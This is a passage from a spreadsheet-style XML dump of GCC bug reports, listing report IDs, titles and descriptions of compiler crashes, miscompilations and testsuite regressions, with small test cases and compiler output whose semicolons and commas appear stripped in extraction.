gcc-3.2.7
Environment:
Red-Hat 8.0 on Pentium Pro</t>
  </si>
  <si>
    <t>bording</t>
  </si>
  <si>
    <t>GCC-63947</t>
  </si>
  <si>
    <t>Wrong fcmov suffix</t>
  </si>
  <si>
    <t>GCC 4.9.2 for x86_64 miscompiles the following code with optimize option -Os.
$ cat error.c 
unsigned int a = 0U
int t = 0
int main (void)
{
  int b = 0
  volatile int c = 0
  long double d = 1.0L
  int e = 0
  t = (((b+e)/d)-(a&gt;(c+a)))
  return 0
}
$ x86_64-unknown-linux-gnu-gcc-4.9.2 error.c -Os
/tmp/ccjhNwLd.s: Assembler messages:
/tmp/ccjhNwLd.s:18: Error: no such instruction: `fcmovnc %st(1)%st'
$ x86_64-unknown-linux-gnu-gcc-4.9.2 -v         
Using built-in specs.
COLLECT_GCC=x86_64-unknown-linux-gnu-gcc-4.9.2
COLLECT_LTO_WRAPPER=/usr/local/x86_64-tools/gcc-4.9.2/libexec/gcc/x86_64-unknown-linux-gnu/4.9.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/usr/local/x86_64-tools/gcc-4.9.2/ --with-gmp=/usr/local/gmp-5.0.5/ --with-mpfr=/usr/local/mpfr-3.1.0/ --with-mpc=/usr/local/mpc-0.9/ --disable-multilib --disable-nls --enable-languages=c
Thread model: posix
gcc version 4.9.2 (GCC)</t>
  </si>
  <si>
    <t>GCC-11949</t>
  </si>
  <si>
    <t>[3.3.1 regression] Compiler segfault with ffmpeg altivec code</t>
  </si>
  <si>
    <t>Using up-to-date Debian GNU/Linux unstable and attempting to compile CVS
snapshot of ffmpeg on my 1st generation Apple PowerBook G4 (Tibook) the
following happens:
LANG=C gcc -maltivec -mabi=altivec -Wall -g -DHAVE_AV_CONFIG_H -I..
-D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -D_GNU_SOURCE -c -o
ppc/idct_altivec.o ppc/idct_altivec.c
ppc/idct_altivec.c:164: internal compiler error: Segmentation fault
Please submit a full bug report
The mentioned line 164 is the end of this:
static const vector_s16_t constants[5] = {
    (vector_s16_t) AVV(23170 13573 6518 21895 -23170 -21895 32 31)
    (vector_s16_t) AVV(16384 22725 21407 19266 16384 19266 21407 22725)
    (vector_s16_t) AVV(22725 31521 29692 26722 22725 26722 29692 31521)
    (vector_s16_t) AVV(21407 29692 27969 25172 21407 25172 27969 29692)
    (vector_s16_t) AVV(19266 26722 25172 22654 19266 22654 25172 26722)
}
Following your instructions here's the more verbose output:
LANG=C gcc -v -save-temps -maltivec -mabi=altivec -Wall -g -DHAVE_AV_CONFIG_H
-I.. -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -D_GNU_SOURCE -c -o
ppc/idct_altivec.o ppc/idct_altivec.c
Reading specs from /usr/lib/gcc-lib/powerpc-linux/3.3.2/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcada --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-java-gc=boehm --enable-java-awt=xlib
--enable-objc-gc --disable-multilib powerpc-linux
Thread model: posix
gcc version 3.3.2 20030812 (Debian prerelease)
 /usr/lib/gcc-lib/powerpc-linux/3.3.2/cc1 -E -quiet -v -I.. -D__GNUC__=3
-D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=2 -D__unix__ -D__gnu_linux__
-D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=unix -Asystem=posix
-DHAVE_AV_CONFIG_H -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -D_GNU_SOURCE
ppc/idct_altivec.c -maltivec -mabi=altivec -Wall idct_altivec.i
ignoring nonexistent directory /usr/powerpc-linux/include
#include ... search starts here:
#include  search starts here:
 ..
 /usr/local/include
 /usr/lib/gcc-lib/powerpc-linux/3.3.2/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/powerpc-linux/3.3.2/cc1 -fpreprocessed idct_altivec.i -quiet
-dumpbase idct_altivec.c -maltivec -mabi=altivec -auxbase-strip
ppc/idct_altivec.o -g -Wall -version -o idct_altivec.s
GNU C version 3.3.2 20030812 (Debian prerelease) (powerpc-linux)
        compiled by GNU C version 3.3.2 20030812 (Debian prerelease).
GGC heuristics: --param ggc-min-expand=55 --param ggc-min-heapsize=48089
ppc/idct_altivec.c:164: internal compiler error: Segmentation fault
Please submit a full bug report
Please guide me if you need me to do dig up more info or do some tests. I can't
really code myself only compile written code and mess around with scripts (I do
Debian package maintainance) so spell it out if you want me to use a debugger
or other woodo.
(hmm - let's see if I can figure out how to attach the *.i.bz2 file to this
bugreport when filed there is no attach button on the current page...)</t>
  </si>
  <si>
    <t>dr</t>
  </si>
  <si>
    <t>GCC-41536</t>
  </si>
  <si>
    <t>always_inline does not work always with constructors</t>
  </si>
  <si>
    <t>The following testcase fails:
// { dg-do compile }
struct f
{
  inline f(void)
  inline void f1(void)
  int a
}
inline __attribute__((always_inline))  f::f(void)
{
  a++
}
inline __attribute__((always_inline)) void  f::f1(void)
{
  a++
}
void g(void)
{
  f a b c d
  a.f1()
}
// f::f() should be inlined even at -O0
// { dg-final { scan-assembly-not _ZN1fC1Ev } }
// Likewise for f::f1()
// { dg-final { scan-assembly-not _ZN1f2f1Ev } }
--- CUT ---
_ZN1fC1Ev is being defined in the source still and not being inlined.</t>
  </si>
  <si>
    <t>GCC-43913</t>
  </si>
  <si>
    <t>error: â€˜â€™ is not a valid template argument for type â€˜intâ€™ because it is a non-constant expression</t>
  </si>
  <si>
    <t>/home/manuel/src/test/gcc/testsuite/g++.dg/template/recurse3.C: In instantiation of â€˜const int Y::valueâ€™:
/home/manuel/src/test/gcc/testsuite/g++.dg/template/recurse3.C:17:17:   instantiated from here
/home/manuel/src/test/gcc/testsuite/g++.dg/template/recurse3.C:13:46: error: â€˜â€™ is not a valid template argument for type â€˜intâ€™ because it is a non-constant expression
Testcase is related to PR9335.
// PR c++/9335
// We should not see an error about non-constant initialization.
// { dg-do compile }
// { dg-options -ftemplate-depth-15 }
template struct Y
template  struct X {
  static const int value = X::value&gt;::value
  // { dg-message skipping \d instantiation contexts  { target *-*-* } 0 }
  // { dg-bogus expression error  { xfail *-*-* } 0 }
}
template  struct Y {
  static const int value = Y::value&gt;::value  // { dg-error incomplete type }
}
template struct Y</t>
  </si>
  <si>
    <t>GCC-7766</t>
  </si>
  <si>
    <t>ZipInputStream.available returns 0 immediately after construction</t>
  </si>
  <si>
    <t xml:space="preserve">	Immediately after construction of a ZipInputStream available()
        will return 0.  Sun's javadoc states Returns 0 after EOF has
        reached for the current entry data otherwise always return 1.
        My interpretation is there is no current entry so EOF hasn't
        been reached on it yet so return 1.
Release:
3.3 20020828 (experimental)
Environment:
System: Linux churchill 2.4.3-12 #1 Fri Jun 8 15:05:56 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/home/user/jmr/app/gcc --enable-langs=c++java --enable-shared --enable-threads=posix --with-as=/home/user/jmr/app/binutils/bin/as --with-ld=/home/user/jmr/app/binutils/bin/ld : (reconfigured)
How-To-Repeat:
 cat ZISAvailTest.java
import java.net.URL
import java.util.zip.ZipInputStream
public class ZISAvailTest {
    public static void main(String[] s) throws Exception {
        URL u = new URL(http://www.xwt.org/dist/xwt-0258.jar)
        System.err.println(new ZipInputStream(u.openStream()).available())
    }
}
 gcj ZISAvailTest.java --main=ZISAvailTest      
 ./a.out
0
Whereas Sun's jdk gives:
 javac ZISAvailTest.java
 java ZISAvailTest
1</t>
  </si>
  <si>
    <t>GCC-10133</t>
  </si>
  <si>
    <t>public/protected member of template base class is not seen in derived template class.</t>
  </si>
  <si>
    <t>The following is a regression it compiles with all
versions up till and including 3.3 (20030313).
I am not 100% sure it *should* compile.
&gt; cat test.cc
template 
  struct B {
    int i
  }
template 
  struct A : public B  {
    void f() { int* p =  }
  }
&gt; g++-cvs-3.4 -c test.cc
test.cc: In member function `void A::f()':
test.cc:8: error: `i' has not been declared
Release:
gcc version 3.4 20030313 (experimental)</t>
  </si>
  <si>
    <t>GCC-10432</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE in poplevel at cp/decl.c:1230</t>
  </si>
  <si>
    <t>This ICEs:
----------------------
struct INCOMPLETE
template  struct X {
    static INCOMPLETE value
}
template  INCOMPLETE X::value = 0
----------------------
mortar/laplace&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c x.cc
x.cc:5: error: variable `INCOMPLETE X::value' has initializer but incomplete
   type
x.cc:5: internal compiler error: in poplevel at cp/decl.c:1230
It ICEs since 3.0 but didn't before. Looks like just
another error recovery problem.
W.
Release:
unknown
Environment:
3.2 3.3 and mainline</t>
  </si>
  <si>
    <t>GCC-35447</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 regression] ICE with broken statement expression</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.1.0:
======================
void foo()
{
  ({ int i(). })
}
======================
bug.c: In function 'i':
bug.c:3: error: expected declaration specifiers before '.' token
bug.c:3: error: expected declaration specifiers before '}' token
bug.c:3: error: expected declaration specifiers before ')' token
bug.c:4: error: expected declaration specifiers before '}' token
bug.c:4: error: expected '{' at end of input
bug.c: In function 'foo':
bug.c:4: error: expected declaration or statement at end of input
bug.c:4: internal compiler error: tree check: expected bind_expr have decl_expr in c_finish_stmt_expr at c-typeck.c:7649
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-65136</t>
  </si>
  <si>
    <t>[5 Regression] VRP inserts unnecessary constant copy in the loop</t>
  </si>
  <si>
    <t>For the following piece of code
int foo (unsigned int cc)
{
   while ( cc &gt;&gt; 16 )
      {
      cc = (cc 
      }
   return cc == 1
}
at o2 we have 
        movl    %edi %eax
        shrl    $16 %eax
        testl   %eax %eax
        je      .L2
        .p2align 410
        .p2align 3
.L3:
        movzwl  %di %edi
        addl    %eax %edi
        movl    $1 %eax        
        movl    %edi %edx
        shrl    $16 %edx
        testl   %edx %edx
        jne     .L3
while with -fno-tree-vrp
        jmp     .L8
        .p2align 410
        .p2align 3
.L3:
        movzwl  %di %edi
        addl    %eax %edi
.L8:
        movl    %edi %eax
        shrl    $16 %eax
        testl   %eax %eax
        jne     .L3
vrp changes loop in a following way
  :
  # cc_12 = PHI 
  # _13 = PHI 
  _4 = cc_12 
  cc_5 = _13 + _4
  _3 = cc_5 &gt;&gt; 16
  if (_3 != 0)
    goto 
  else
    goto 
resulted in constant copy to be inserted.</t>
  </si>
  <si>
    <t>GCC-64240</t>
  </si>
  <si>
    <t>[5.0 Regression][AArch64] SMS-3.c causes runtime exception(segfault).</t>
  </si>
  <si>
    <t>When sms-3 is compiled with -fPIC for aarch64 the test itself segfaults during execution.
 ../../bin/install/bin/aarch64-unknown-linux-gnu-gcc  -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -fmodulo-sched -funroll-loops -fdump-rtl-sms --param sms-min-sc=1 -fmodulo-sched-allow-regmoves  -lm -mcmodel=small testsuite/gcc.dg/sms-3.c -o /tmp/sms-3.exe -g -fPIC
When I reverse this patch out it runs fine:
https://gcc.gnu.org/ml/gcc-patches/2014-11/msg02255.html</t>
  </si>
  <si>
    <t>GCC-71489</t>
  </si>
  <si>
    <t>[7 regression] gcc.dg/tree-ssa/attr-hotcold-2.c FAILs</t>
  </si>
  <si>
    <t>Between 20160606 and 20160609 the gcc.dg/tree-ssa/attr-hotcold-2.c test started
to error out:
+ERROR: gcc.dg/tree-ssa/attr-hotcold-2.c: error executing dg-final: syntax error in target selector profile_estimate
+UNRESOLVED: gcc.dg/tree-ssa/attr-hotcold-2.c: error executing dg-final: syntax error in target selector profile_estimate
This is due to a syntax error in Jan's last change:
/* { dg-final { scan-tree-dump-times 1 hot label heuristics 1 profile_estimat
e } } */
/* { dg-final { scan-tree-dump-times 1 cold label heuristics 1 profile_estima
te } } */
The first arg to scan-tree-dump times is supposed to be a regexp not a count.
But even with that fixed the testcase FAILs:
FAIL: gcc.dg/tree-ssa/attr-hotcold-2.c scan-tree-dump-times profile_estimate block 4 loop depth 0 count 0 freq [1-4][^0-9] 1
 basic block 4 loop depth 0 count 0 freq 2 maybe hot
   basic block 4 loop depth 0 count 0 freq 2 maybe hot
   basic block 4 loop depth 0 count 0 freq 2
FAIL: gcc.dg/tree-ssa/attr-hotcold-2.c scan-tree-dump-times profile_estimate block 5 loop depth 0 count 0 freq [6-9][0-9][0-9][0-9] 1
 basic block 5 loop depth 0 count 0 freq 7660 maybe hot
   basic block 5 loop depth 0 count 0 freq 7660 maybe hot
   basic block 5 loop depth 0 count 0 freq 7660 maybe hot
This is a regression from the gcc-6 branch.
  Rainer</t>
  </si>
  <si>
    <t>GCC-46500</t>
  </si>
  <si>
    <t>target.h includes tm.h</t>
  </si>
  <si>
    <t>Because some hooks are defined in terms of CUMULATIVE_ARGS target.h includes
tm.h .  That defeats the purpose of the target hooks.</t>
  </si>
  <si>
    <t>GCC-22115</t>
  </si>
  <si>
    <t>[4.1 regression] testsuite failure: g++.dg/conversion/simd2.C</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Sat Jun 18 12:53:47 UTC 2005 I get:
Running /home/hp/combined/combined/gcc/testsuite/g++.dg/dg.exp ...
...
FAIL: g++.dg/conversion/simd2.C  (test for errors line 15)
FAIL: g++.dg/conversion/simd2.C (test for excess errors)
With the message in the .log being:
x/combined/gcc/testsuite/g++.dg/conversion/simd2.C: In function 'void foo()':^M
x/combined/gcc/testsuite/g++.dg/conversion/simd2.C:15: error: invalid operands
to binary +^M
Last known to work on: Wed Jun 15 07:31:22 UTC 2005.
Known to fail on: Thu Jun 16 09:31:56 UTC 2005.
Maybe it's as simple as a missing update of g++.dg/conversion/simd2.C but
there wasn't any expected error there before as there was with the simd tests in
testsuite/gcc.dg in that time-frame.  Expert (and author of changes in the
time-frame) CC:ed.</t>
  </si>
  <si>
    <t>GCC-79388</t>
  </si>
  <si>
    <t>[6 Regression] wrong code with -O -fno-tree-coalesce-vars</t>
  </si>
  <si>
    <t>Created attachment 40675
reduced testcase
Output:
$ x86_64-pc-linux-gnu-gcc -O -fno-tree-coalesce-vars testcase.c
$ ./a.out 
Aborted
$ /repo/gcc-trunk/binary-latest-amd64/bin/x86_64-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-amd64/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-245149-checking-yes-rtl-df-extra-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-245149-checking-yes-rtl-df-extra-nographite-amd64
Thread model: posix
gcc version 7.0.1 20170203 (experimental) (GCC) 
The .combine dump has:
(insn 22 21 23 2 (set (mem/c:SI (symbol_ref:DI (c) [flags 0x2] ) [1 cD.1797+0 S4 A32])
        (reg/v:SI 91 [ pD.1798 ])) testcase.c:12 82 {*movsi_internal}
     (expr_list:REG_DEAD (reg/v:SI 91 [ pD.1798 ])
        (nil)))
(note 23 22 24 2 NOTE_INSN_DELETED)
(insn 24 23 29 2 (set (reg:SI 102)
        (mem/c:SI (symbol_ref:DI (a) [flags 0x2] ) [1 aD.1796+0 S4 A32])) testcase.c:13 82 {*movsi_internal}
     (nil))
reg 91 was originally used in insn 24 but the use somehow disappeared.</t>
  </si>
  <si>
    <t>GCC-1891</t>
  </si>
  <si>
    <t>Internal compiler error in find_free_reg at</t>
  </si>
  <si>
    <t>upon doing a 'make bootstrap' I get this error:
../gcc/gcc/. -I../../gcc/gcc/config -I../../gcc/gcc/../include  -fexceptions
-DL
_eh -c ../../gcc/gcc/libgcc2.c -o libgcc/./_eh.o
In file included from ../../gcc/gcc/gthr-posix.h:37
                 from gthr-default.h:1
                 from ../../gcc/gcc/gthr.h:98
                 from ../../gcc/gcc/libgcc2.c:3135:
/usr/include/pthread.h:71: warning: function declaration isn't a prototype
In file included from gthr-default.h:1
                 from ../../gcc/gcc/gthr.h:98
                 from ../../gcc/gcc/libgcc2.c:3135:
../../gcc/gcc/gthr-posix.h:40: parse error before __gthread_once_t
../../gcc/gcc/gthr-posix.h:40: warning: type defaults to `int' in
declaration of
 `__gthread_once_t'
../../gcc/gcc/gthr-posix.h:40: warning: data definition has no type or
storage c
lass
../../gcc/gcc/gthr-posix.h:427: parse error before '*' token
../../gcc/gcc/gthr-posix.h:427: parse error before ')' token
../../gcc/gcc/gthr-posix.h: In function `__gthread_key_create':
../../gcc/gcc/gthr-posix.h:438: too many arguments to function
`pthread_key_crea
te'
../../gcc/gcc/gthr-posix.h: In function `__gthread_key_dtor':
../../gcc/gcc/gthr-posix.h:446: incompatible type for argument 1 of
`pthread_set
specific'
../../gcc/gcc/gthr-posix.h: In function `__gthread_key_delete':
../../gcc/gcc/gthr-posix.h:454: incompatible type for argument 1 of
`pthread_key
_delete'
../../gcc/gcc/gthr-posix.h: In function `__gthread_getspecific':
../../gcc/gcc/gthr-posix.h:460: incompatible type for argument 1 of
`pthread_get
specific'
../../gcc/gcc/gthr-posix.h: In function `__gthread_setspecific':
../../gcc/gcc/gthr-posix.h:466: incompatible type for argument 1 of
`pthread_set
specific'
../../gcc/gcc/libgcc2.c: In function `eh_context_initialize':
../../gcc/gcc/libgcc2.c:3290: syntax error before once
../../gcc/gcc/libgcc2.c:3294: warning: implicit declaration of function
`__gthre
ad_once'
../../gcc/gcc/libgcc2.c:3294: `once' undeclared (first use in this function)
../../gcc/gcc/libgcc2.c:3294: (Each undeclared identifier is reported only
once
../../gcc/gcc/libgcc2.c:3294: for each function it appears in.)
../../gcc/gcc/libgcc2.c:3302: syntax error before once_regsizes
../../gcc/gcc/libgcc2.c:3303: `once_regsizes' undeclared (first use in this
func
tion)
make[3]: *** [libgcc/./_eh.o] Error 1
make[3]: Leaving directory `/d/dev/gnu/objdir/gcc'
make[2]: *** [libgcc.a] Error 2
make[2]: Leaving directory `/d/dev/gnu/objdir/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/d/dev/gnu/objdir/gcc'
make: *** [bootstrap] Error 2
Release:
2.97 20010117 (experimental)
Environment:
System: CYGWIN_NT-5.0 WEPO-OD-AVM3W2K 1.1.6(0.30/3/2) 2000-11-21 21:00 i686
unknown
host: i686-pc-cygwin
build: i686-pc-cygwin
target: i686-pc-cygwin
configured with: ../gcc/configure --enable-threads=posix
--prefix=/d/dev/gcc_build --enable-shared --enable-languages=c++java
--disable-new-gxx-abi : (reconfigured) ../gcc/configure
--enable-threads=posix --prefix=/d/dev/gcc --enable-shared
--enable-languages=c++java --disable-new-gxx-abi : (reconfigured)
../gcc/configure --enable-threads=posix --prefix=/d/dev/gcc --enable-shared
--enable-languages=c++java --disable-new-gxx-abi : (reconfigured)
../gcc/configure --enable-threads=posix --prefix=/d/dev/gcc --enable-shared
--enable-languages=c++java --disable-new-gxx-abi : (reconfigured)
../gcc/configure --enable-threads=posix --prefix=/d/dev/gcc --enable-shared
--enable-languages=c++java --disable-new-gxx-abi : (reconfigured)  :
(reconfigured) ../gcc/configure --enable-threads=posix --prefix=/d/dev/gcc
--enable-shared --enable-languages=c++java --disable-new-gxx-abi :
(reconfigured) ../gcc/configure --enable-threads=posix --prefix=/d/dev/gcc
--enable-shared --enable-languages=c++java --disable-new-gxx-abi :
(reconfigured)  : (reconfigured) ../gcc/configure --enable-threads=posix
--prefix=/d/dev/gcc --enable-shared --enable-languages=c++java
--disable-new-gxx-abi --with-included-gettext : (reconfigured)
../gcc/configure --enable-threads=posix --prefix=/d/dev/gcc --enable-shared
--enable-languages=c++java --with-included-gettext --disable-win32-registry
: (reconfigured) ../gcc/configure --enable-threads=posix --prefix=/d/dev/gcc
--enable-shared --enable-languages=c++java --with-included-gettext
--disable-win32-registry : (reconfigured)  : (reconfigured) ../gcc/configure
--enable-threads=posix --prefix=/d/dev/gcc --enable-shared
--enable-languages=c++java --with-included-gettext --disable-win32-registry
How-To-Repeat:
make bootstrap
Unformatted:
 X-send-pr-version: 3.113
 X-GNATS-Notify: 
 local-alloc.c:2149</t>
  </si>
  <si>
    <t>avm3</t>
  </si>
  <si>
    <t>GCC-21664</t>
  </si>
  <si>
    <t>array-of-empty-structure extension not properly defined</t>
  </si>
  <si>
    <t>For
struct {} a[4] int main() { return  }
the C frontend emits
  return 0 /[ex] 0
which will at -O0 fault at runtime at -O not due to RTL CSE.
Is this even well-defined?  Should the C-frontend rather emit
 return 0
?  Of course this contradicts the C standard but that does not
allow empty structures anyway.</t>
  </si>
  <si>
    <t>GCC-14203</t>
  </si>
  <si>
    <t>[3.4 regression] ICE on warning about uninitialized variable</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/233548]
with 3.4 CVS 20040215:
g++ -Wall bug-233548.cc
bug-233548.cc: In function `int main()':
bug-233548.cc:19: warning: unused variable 'dummy'
bug-233548.cc:26: internal compiler error: in make_decl_rtl at varasm.c:752
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
namespace Data 
{ 
  class Dummy 
} 
namespace 
{ 
  const bool g_bAlways = false 
  Data::Dummy* getDummy() 
} 
int main() 
{ 
  int i 
  if (g_bAlways) 
  { 
     if (Data::Dummy* dummy = getDummy()) 
     { 
        int bla(5) 
        i = bla 
     } 
  } 
}</t>
  </si>
  <si>
    <t>GCC-71491</t>
  </si>
  <si>
    <t>[7 Regression] gcc.dg/vect/slp-43.c FAILs</t>
  </si>
  <si>
    <t>Created attachment 38674
slp-43.c.149t.vect
The new gcc.dg/vect/slp-43.c testcase FAILs on Solaris/SPARC:
+FAIL: gcc.dg/vect/slp-43.c -flto -ffat-lto-objects  scan-tree-dump-times vect 
vectorized 1 loops 13
+FAIL: gcc.dg/vect/slp-43.c scan-tree-dump-times vect vectorized 1 loops 13
both 32 and 64-bit.
There are only 2 matching lines in the dump and several instances each of
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/vect/slp-43.c:35:1: note: not vectorized: unsupported unaligned load.*in_1
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/vect/slp-43.c:73:3: note: not v
ectorized: control flow in loop.
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/vect/slp-43.c:55:3: note: not vectorized: loop contains function calls or data references that cannot be analyzed
I'm attaching the dump.
  Rainer</t>
  </si>
  <si>
    <t>GCC-38970</t>
  </si>
  <si>
    <t>[4.4 Regression] Revision 143662 caused many failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 143662 caused:
FAIL: g++.dg/ext/bitfield2.C (test for excess errors)
FAIL: g++.dg/ext/bitfield4.C (test for excess errors)
FAIL: gcc.dg/bitfld-15.c (test for excess errors)
FAIL: gcc.dg/bitfld-17.c (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-7349</t>
  </si>
  <si>
    <t>ia64 function pointer :</t>
  </si>
  <si>
    <t>The generated code for the program is not correct.It seem that without -O the third call are not correct.
This code compiler correctly on Solaris/sparc 
FreeBSD/i386 linux/i386.
Release:
gcc version 2.96
Environment:
Linux malraux 2.4.18 #2 SMP Tue Jul 9 11:28:20 CEST 2002 ia64 unknown
How-To-Repeat:
Compile &amp; execute without -O on an ia64 platform</t>
  </si>
  <si>
    <t>hpc</t>
  </si>
  <si>
    <t>GCC-12109</t>
  </si>
  <si>
    <t>ICE in process_worklist at tree-ssa-dce.c</t>
  </si>
  <si>
    <t>void *do_it(void * dest const void * src)
double *create_float(void)
void parse_rvalue(void **DataPtr)
{
  double local = 0.0
  int terms = 1
  *DataPtr = create_float()
  switch (terms)
    {
    case 1:
      *((double *)*DataPtr) = local
      break
    case 2:
      do_it(*DataPtr 
      break
    }
}
gcc version 3.5-tree-ssa 20030830 (merged 20030817)
$ gcc -c -W -Wall -O2 parse.i
parse.i: In function `parse_rvalue':
parse.i:20: internal compiler error: tree check: expected ssa_name have
var_decl in process_worklist at tree-ssa-dce.c:412
regards
Philippe Elie</t>
  </si>
  <si>
    <t>GCC-63668</t>
  </si>
  <si>
    <t>-mstd-struct-return fails for non-leaf functions</t>
  </si>
  <si>
    <t>With optimization the return address adjustment that's
applied for -mstd-struct-return is deleted as dead code
resulting in a return directly to the unimp insn.
struct S { int x y z }
void bar(void)
struct S foo(void)
{
  struct S s = { 1 2 3 }
  bar()
  return s
}
-O0:
        save    %sp -128 %sp
        ld      [%i7+8] %g1
        add     %i7 4 %i7
        cmp     %g1 12
        be      .L2
         nop
        sub     %i7 4 %i7
        add     %fp -20 %g1
        st      %g1 [%fp+64]
.L2:
-O2:
foo:
        save    %sp -112 %sp
        ld      [%i7+8] %g1
        cmp     %g1 12
        be      .L2
         add    %fp -4 %g1
        st      %g1 [%fp+64]
.L2:</t>
  </si>
  <si>
    <t>GCC-70685</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE: Segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 38284
unreduced testcase
A very recent regression. Was fine a yesterday.
markus@x4 /tmp % clang++ -std=c++14 -c sum.ii
markus@x4 /tmp % g++ -c sum.ii
In file included from ../libs/hana/test/range/sum.cpp:9:0:
../boost/hana/range.hpp: In instantiation of â€˜static constexpr auto boost::hana::sum_impl::apply(const boost::hana::range T = int T from = -3 T to = -1]â€™:
../boost/hana/sum.hpp:45:42:   required from â€˜constexpr decltype(auto) boost::hana::sum_t::operator()(Xs M = boost::hana::integral_constant_tag]â€™
../libs/hana/test/range/sum.cpp:23:102:   required from here
../boost/hana/range.hpp:187:61:   in constexpr expansion of â€˜boost::hana::sum_impl::sum_helper(-3 (-1 - 1))â€™
../boost/hana/range.hpp:182:35:   in constexpr expansion of â€˜boost::hana::sum_impl::sum_helper((- n) (- m))â€™
../boost/hana/range.hpp:187:20: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-43029</t>
  </si>
  <si>
    <t>enum_5.f90 ICE under valgrind</t>
  </si>
  <si>
    <t>valgrind ./f951 ../../gcc/testsuite/gfortran.dg/enum_5.f90 fails with:
==13267== Invalid read of size 4
==13267==    at 0x3EA2A142A0: __gmpz_cmp (in /usr/lib64/libgmp.so.3.5.0)
==13267==    by 0x41F6D8: create_enum_history (decl.c:1186)
==13267==    by 0x428F13: enumerator_decl (decl.c:7142)
==13267==    by 0x42901B: gfc_match_enumerator_def (decl.c:7194)
==13267==    by 0x475267: match_word (parse.c:65)
==13267==    by 0x475A80: decode_statement (parse.c:284)
==13267==    by 0x4770D8: next_free (parse.c:715)
==13267==    by 0x4774A8: next_statement (parse.c:900)
==13267==    by 0x478A93: parse_enum (parse.c:2122)
==13267==    by 0x4794D8: parse_spec (parse.c:2554)
==13267==    by 0x47ADD6: parse_progunit (parse.c:3758)
==13267==    by 0x47B75C: gfc_parse_file (parse.c:4146)
==13267==  Address 0x5583b24 is 132 bytes inside a block of size 192 free'd
==13267==    at 0x4A04D72: free (vg_replace_malloc.c:325)
==13267==    by 0x467751: gfc_free (misc.c:51)
==13267==    by 0x432061: gfc_free_expr (expr.c:232)
==13267==    by 0x4B0E5D: gfc_free_symbol (symbol.c:2430)
==13267==    by 0x4B18A2: gfc_undo_symbols (symbol.c:2809)
==13267==    by 0x47800D: reject_statement (parse.c:1612)
==13267==    by 0x47528E: match_word (parse.c:70)
==13267==    by 0x475A80: decode_statement (parse.c:284)
==13267==    by 0x4770D8: next_free (parse.c:715)
==13267==    by 0x4774A8: next_statement (parse.c:900)
==13267==    by 0x478A93: parse_enum (parse.c:2122)
==13267==    by 0x4794D8: parse_spec (parse.c:2554)
on both 4.4 branch and the trunk.  The problem is that on error enum history isn't freed so it references exprs from rejected statements.</t>
  </si>
  <si>
    <t>GCC-31807</t>
  </si>
  <si>
    <t>bootstrap failure in 4.2.0 RC3. const_point_iterator.hpp not found</t>
  </si>
  <si>
    <t>I was trying to bootstrap from the 4.2.0 RC3 tarball.
Configured as:
../gcc-4.2.0-20070501/configure --with-arch=mips32 --with-float=soft --disable-java-awt --without-x --disable-tls --enable-__cxa_atexit --disable-jvmpi --disable-static --disable-libmudflap --enable-languages=cc++java
A similar bootstrap from SVN sources a couple of weeks ago was successful:
http://gcc.gnu.org/ml/gcc-testresults/2007-04/msg00666.html
The result is this failure in stage3 while building libstdc++:
